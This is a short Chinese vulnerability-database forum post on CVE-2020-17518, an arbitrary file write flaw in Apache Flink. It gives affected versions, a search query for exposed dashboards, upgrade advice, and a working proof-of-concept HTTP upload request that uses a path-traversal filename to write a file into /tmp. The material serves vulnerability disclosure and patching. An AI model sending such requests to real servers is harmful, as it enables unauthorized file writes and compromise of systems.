Apache Flink 任意文件写入(CVE-2020-17518) - 💉 漏洞库极核论坛 - 知识星球 - 极核GetShell

Apache Flink 任意文件写入(CVE-2020-17518)

漏洞名称

Apache Flink 任意文件写入(CVE-2020-17518)

CVE: CVE-2020-17518
DVB: DVB-2021-2269

漏洞信息

【涉及版本】:Flink1.5.1-1.11.2

【漏洞描述】:ApacheFlink是一个开源的流处理框架,具有强大的流处理和批处理功能。\ 1.5.1版本中引入了REST API,该漏洞允许攻击者通过构造恶意的HTTP header,将上传的文件写入到本地文件系统上的任意位置。
【漏洞类型】:任意文件写入

 

资产搜索

 title=”Apache Flink Web Dashboard”

修复建议

请用户将Flink升级到1.11.3或1.12.0

下载地址:https://flink.apache.org/downloads.html

POC

POST /jars/upload HTTP/1.1
Host: 192.168.18.169:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13247690941547071692111317477
Content-Length: 248
Origin: http://192.168.18.169:8081
Connection: close
Referer: http://192.168.18.169:8081/


-----------------------------13247690941547071692111317477
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/veraxy"
Content-Type: text/plain


Veraxy!!!
-----------------------------13247690941547071692111317477-

该POC来源互联网,如有侵权请联系删除

请登录后发表评论

    没有回复内容